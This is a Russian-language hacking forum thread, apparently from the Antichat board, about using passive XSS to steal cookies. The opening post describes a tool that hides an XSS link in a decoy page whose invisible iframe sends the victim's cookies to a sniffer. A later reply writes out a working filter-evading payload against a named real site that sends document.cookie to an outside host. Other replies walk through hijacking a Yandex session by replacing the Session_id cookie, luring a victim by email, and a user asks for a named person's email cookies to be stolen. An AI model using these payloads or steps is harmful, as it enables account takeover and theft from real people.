Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Для новичков (пассивные Xss) (https://forum.antichat.xyz/showthread.php?t=21375)

DRON-ANARCHY 05.07.2006 16:31

Для новичков (пассивные Xss)
 
Дело было давно... я написал вот такой простенький скрипт.
он предназначен для тех, кому в этом разделе указали на пассивные XSS.
Если вы не знаете, что с ними делать, заходите сюда:
http://www.dron-anarchy.jino-net.ru/xss/XSS.php

Идея не нова(как просвятил меня NOFEAR)
но скрипт написан уже давно, а выложен совсемнедавно(ввиду жутких проблем с нетом)
так что пользуйте, о новички этой темы=)

GreenBear 05.07.2006 18:07

Типа http://loc.netsec.ru/ ?

Цитата:

При запросе страницы с сайта нашего пользователя произошла ошибка 404. Запрашиваемый файл не найден. Проверьте правильность ввода URL.
=))

DRON-ANARCHY 26.07.2006 10:41

типа да. Но где ты узрел 404 я не знаю...
Плюс ко всему я понял, что люди неисправимы... я посмотрел, чем забивают скрипт..туда пишут просто названия чатов, сайтов и т.п. типа скрипт сам должен искать уязвимости...Хоть бы инструкции читали...=(

Dimi4 21.05.2007 21:13

Молоток, што скрипт закинул
гы, но ето ЛОЛ чистой воды
Цитата:

1 . Запрещается использовать скрипт в целях, противоречащих законодательству РФ
2. Запрещается использование скрипта для нанесения вреда другим пользователям
А для чего ты его используеш?
----------------------------------------------------------------
Претензий не имею, все ОК!

Антошка2003 21.05.2007 22:52

в целях проверки

DRON-ANARCHY 27.05.2007 12:25

лол чистой воды?))
гыгыгыы

Антошка2003 +1

Dimi4 04.06.2007 12:43

Цитата:

Сообщение от DRON-ANARCHY
лол чистой воды?))
гыгыгыы

Антошка2003 +1

Ты прав, сейчас чистой воды небивает :)

Sol-leks 23.06.2007 21:58

Так это типа фейк? Не понимаю как работает))

.Slip 23.06.2007 22:03

Цитата:

Сообщение от Sol-leks
Так это типа фейк? Не понимаю как работает))

Не фейк, скорее перенаправление скриптом. Пользователь открывает ссылку, обращается к срипту, скрипт берёт из бд записанную ссылку, и уже перенаправляет браузер на исходную ссылку.

Piflit 23.06.2007 22:06

Цитата:

Сообщение от Sol-leks
Так это типа фейк?

фейк чего?

_Great_ 23.06.2007 22:44

Он просто генерирует непалевную ссылку для пассивной ксс.. чтобы было типа dron-anarchy.blablabla.com/43950923485029384.html а не somechat.ru/chat.php?param=<script src='http://myhost.com/a.js'></script>

DRON-ANARCHY 14.07.2007 14:49

О... некрофилия процветает. Опять этот топик подняли со дна)))
по такому случаю надо пойти и залить более-менее нормальную версию на скачку

обновил. Опять просмотрел все сгенерированные файлы... никто не пользуется почти по назначению. все пишут название сайта и ждут пока скрипт найдет там XSS гыгы

DRON-ANARCHY 14.07.2007 15:27

кстати
Цитата:

Сообщение от Слип
Не фейк, скорее перенаправление скриптом. Пользователь открывает ссылку, обращается к срипту, скрипт берёт из бд записанную ссылку, и уже перенаправляет браузер на исходную ссылку.

Нет. Не так.
Т.к. скрипт работает без баз данных(думаю, понятно по какой причине) то все делается так:
скрипт создает страницу, содержащую невидимый фрейм, в который грузится страница с вставленным XSS-кодом. Тебе дается ссылка на страницу, при заходе на которую ты видишь грустную новость о том, что что-то там не активно. Если ты совсем параноик, то смотришь в исходный код и о чудо, благодаря модификации скрипта ничего вразумительного там не находишь. Со спокойной душой закрываешь страницу и идешь спать. А куки уже улетели через фрейм на сниффер.

Worms 26.09.2007 17:03

ну может и не в тему,но не получилось что-то снифера залить,может посмотрите ,что можно сделать?
http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>alert(0)</script>

DRON-ANARCHY 27.09.2007 22:05

в куках лежит тока Id сессии...
если скажешь, что значит
Цитата:

снифера залить
то может и поможем)

Mixon 15.03.2008 15:23

Может ет и не по теме но я уже прочетал кучу статей по пасивных хсс но так и ничего у меня не вышло. Может кто даст мне ПОЛНЫЙ скрипт который нужно вставить в html код и об'яснит где окажутся куки после того так их он стырил. Плиз, помогите.....

ZET36 17.03.2008 00:34

Цитата:

Сообщение от Worms
ну может и не в тему,но не получилось что-то снифера залить,может посмотрите ,что можно сделать?
http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>alert(0)</script>

заливают шеллы и заливную рыбу))

скрипт передачи куков на снифер вставляется в твоём случае так.

например мой адрес снифа
http://antichat.org/s/red.gif

кодируем
Код:

<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
в чар код так как на том сайте экранируются кавычки и фильтруется плюсь
и вставляем так
Код:

http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,111,114,103,47,115,47,114,101,100,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62))</script>
без пробелов между цифрами
лог снифера http://antichat.org/s/red/log.php можеш им пользоваться

Mixon тебе тоже этот ответ адресуется так как в на примере показана хсс

а вообще с вопросами сюда http://forum.antichat.ru/thread46016.html

Mixon 18.03.2008 01:24

А как со снифера достать кук (сниф античатовский)???

ZET36 18.03.2008 02:14

Mixon смотриш пришедшую запись (QUERY:) дальше ищещ в пришедших куках переменную с сесией и подставляеш через оперу значение этой переменной за место своей которая у тебя на нужном сайте и ты под чужим акком

Mixon 18.03.2008 08:44

Я вижу в лог файле вижу записи а вот пришедшых куков найти немогу.
П.с. а нигде случайно нету именно по етому статейки? А то в статьях по хсс не пишут как их себе подставить. Там только как их стырить и что нужно для подмены опера или кукедит.

Mixon 19.03.2008 15:09

Вопш дело такое, у меня в снифере весит кук который мне нужен. Как мне его себе поставить? Напишыте мне в аську. Вот мой uin: 191069281. +35 WMR ЗА ПОМОЩЬ.

zythar 19.03.2008 15:49

есть плагины для мозиллы и оперы которые меняют куки. качаешь их, ставишь и меняешь.

зы
Цитата:

+35 Wmr ЗА ПОМОЩЬ.
улыбнуло ((*

Mixon 19.03.2008 17:23

Значитсо так, ZYTHAR, есле все ТЫ об`ясниш по подробней то росчитаемся... Ну вот в снифе пишет такое
Запрос с mixa-mixon.narod.ru (17.03.2008 18:28)
IP: 193.109.248.245 Real IP: 192.168.12.19
QUERY: nuid=1678896011202747960
REFERER: http://mixa-mixon.narod.ru/forum.html
AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)
че мне дальше делать??? У меня опера есть....

zythar 19.03.2008 20:07

во первых я не ZYTHAR а zythar ((*

ну что тут трудного то? погугли. в нете туевая хуча разных мануалов. там все нормально расписано
я сам оперу не юзаю. но опера есть. карочь заходим там Tools->Preferences->Advanced->Cookies->Manage Cookies. покопай в этом направлении

зы деньги оставь себе, они мне не нужны ((*

Mixon 19.03.2008 23:26

ну погугли.... а вот что в поиске то написать? даже примерно незнаю что искать. в статьях по хсс ето не описывается (я нигде не видел) так че там писать в поиске?

gold-goblin 19.03.2008 23:43

Как подменить куки в опере к рпимеру....

Mixon 20.03.2008 17:24

Ну на сколько я понял то снифер не полностю куки тыряет и че нужно все делать от строчки query, так оно или как?:confused:

inlanger 20.03.2008 17:29

Сниффер тырит полностью куки. Но, чтобы был смысл их подставлять, в них должен содеражться пасс и логин. Без них куки безполезны.

ZET36 22.03.2008 01:09

Цитата:

Сообщение от Mixon
Значитсо так, ZYTHAR, есле все ТЫ об`ясниш по подробней то росчитаемся... Ну вот в снифе пишет такое
Запрос с mixa-mixon.narod.ru (17.03.2008 18:28)
IP: 193.109.248.245 Real IP: 192.168.12.19
QUERY: nuid=1678896011202747960
REFERER: http://mixa-mixon.narod.ru/forum.html
AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)
че мне дальше делать??? У меня опера есть....

во первых переменная nuid не содержит ссесии
содержит сессию на народе(яндексе) переменная Session_id
а ты заманил на скрипт чела который зашол с неавторизованной страницы и поэтому его ссесия не отошла тебе на сниф.самое простое отправь ссылку с хсс скриптом жертве по почте тогда он зайдёт с авторизованной страницы своей почты

а как удастя перехватить ссесию когда увидиш в поле QUERY: перменную Session_id то в опере
зайди
Инструменты>дополнительно> cookes
выбери yandex.ru (если нет то создай или просто один раз зайди под оперой в свою мастерскую и значения появятся)
увидиш несколько переменных
выбери Session_id
нажми изменить и в поле значение поставь значение переменой Session_id которая пришла тебе на снифер
это значение выглядит примерно так
1207134369.1312.0.19549274.2:47102725:18.47843.595 4.984ec543bf13647b2d81a0fd9af0e59e
сохрани и заходи под оперой на http://narod.yandex.ru/userarea/after_register.xhtml
если всё сделал правильно то попадёш в мастерскую жертвы если на страницу авторизации то в чом то ошибся или эта ссесия уже мертва так что действуй быстрей как только жертва зайдёт на твою ссылку сразу подставляй себе его значение и действуй

Ps за 45 рублей могу видюшку сделать где показано всё в примерах))

Mixon 27.03.2008 18:39

С самими луками уже вроде все понял, теперь осталось есче две весчи, научится хорошо тырить куки, и росшыфровать пароль с них. Ну лучше начать с первого, так вот, с последнего сообщения я понял то что ето способ воровства сайтов на народе, но вот только есле жертва пользуется услугами другой почтовой системы, что идет @mail.ru или @xaker.ru то ничего же не получится, от насколько я знаю то от народа практически никто не пользуется. П.с. Есле я чтото насчет народа не правельно понял, не ругайте сильно.

Mixon 27.03.2008 18:44

Тут есче такое есть, в статьях пишут что можно кодировать-декодировать ссылки для обмана фильтров и админов, и написано что существует много прог для етого и есть сайт, но тот сайт что ими пишут почемуто не пашет, и ни одно название програмы не написано, кто знает програму для етого или норм работающий понятный сайт для етого, напишыте плиз.

Mixon 31.05.2008 13:00

Гы, случайно увидел ету тему, думаю зайду, я уже все давно понял) Ужо и сайт первыл поламал, спс всем за помошь.

YaLTeR 18.06.2008 19:22

сорь что не в тему но когда я создаю сниффер если я хочу имя картинки web то что мне писать в "Картинка:"?????????????????

warlok 30.06.2008 19:15

+document.cookie

Alena_1 06.06.2009 12:02

zet36 а можешь мне пожалуйста найти cookies одной почты,не получается что-то у меня,еси не сложно,вот почта,плиз очень надо !!!!

izymka_girl@mail.ru


Время: 11:45